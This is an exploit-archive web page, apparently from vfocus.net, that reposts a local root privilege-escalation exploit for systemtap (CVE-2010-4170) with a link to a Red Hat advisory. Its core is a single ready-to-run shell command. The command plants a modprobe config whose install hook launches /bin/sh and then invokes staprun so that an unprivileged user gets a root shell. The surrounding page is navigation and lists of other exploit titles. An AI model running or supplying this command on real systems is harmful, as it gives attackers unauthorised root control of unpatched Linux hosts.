首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Local Root Privilege Escalation Vulnerability in systemtap
来源:vfocus.net 作者:Ormandy 发布时间:2010-11-29  

CVE-2010-4170

printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever


RHEL Advisory:
https://rhn.redhat.com/errata/RHSA-2010-0894.html


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel Unix Sockets Loca
·Linux Kernel 'setup_arg_pages(
·MemHT Portal 4.0.1 [user agent
·OSX/Intel - setuid shell x86_6
·CA Internet Security Suite 201
·Linux/ARM - add root user with
·OTSTurntables 1.00.048 (m3u/of
·NCH Officeintercom <= v5.20 Re
·Hanso Player Version 1.4.0 (.m
·Elevation of privileges under
·DATAC RealWin SCADA Server SCP
·Mediacoder 0.7.5.4792 Buffer O
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved